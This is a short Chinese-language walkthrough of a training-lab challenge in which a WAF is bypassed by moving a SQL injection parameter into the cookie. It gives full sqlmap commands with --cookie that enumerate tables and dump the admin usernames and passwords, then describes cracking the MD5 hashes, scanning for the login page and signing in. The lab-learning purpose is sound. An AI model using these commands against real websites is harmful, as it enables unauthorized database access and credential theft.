sql注入之绕过waf（cookie注入）

我们看一下题目：

网址：http://kypt8004.ia.aqlab.cn/index.asp

 

点击一条新闻，查看相关信息

http://kypt8004.ia.aqlab.cn/shownews.asp?id=171

 

 进行简单注入测试

 

 

 

 我们再来看一下该表的列数

进过测试，当order by =11时，会显示数据库错误，可想该表的列数为10列，如图所示。

 

 当我们使用union关键字再一次进行测试的时候，waf又将其过滤掉

 

 所以到这里，我们可以想到，waf设置有一个黑名单过滤问题

（在此处，还调试了大小写编码，一些其他绕过方式，但是都没成功）

所以我们在这里使用Cookie绕过。

使用Burp抓包，改一下Cookie看一下效果

抓住一个包：

 

 修改Cookie

 

 我们发现，只是爆出错误，并没有waf提示，所以绕过成功

我们可以sqlmap跑一下数据

 

 

 

 跑一下表（tables）

sqlmap>sqlmap.py -u "http://kypt8004.ia.aqlab.cn/shownews.asp?" --cookie="id=171" --level 2 --tables

 

 跑出admin表的列

 sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 -T admin --column

 

 接下里，我们跑一下username和password

 sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --dump -T admin -C username,password

 

 

 我们在MD5解密后，在在进行一次扫描网站

 

 我们现在去扫描网站，在进行一次登录。（使用御剑）

 

 找到一个登录，进行登录

 

 成功。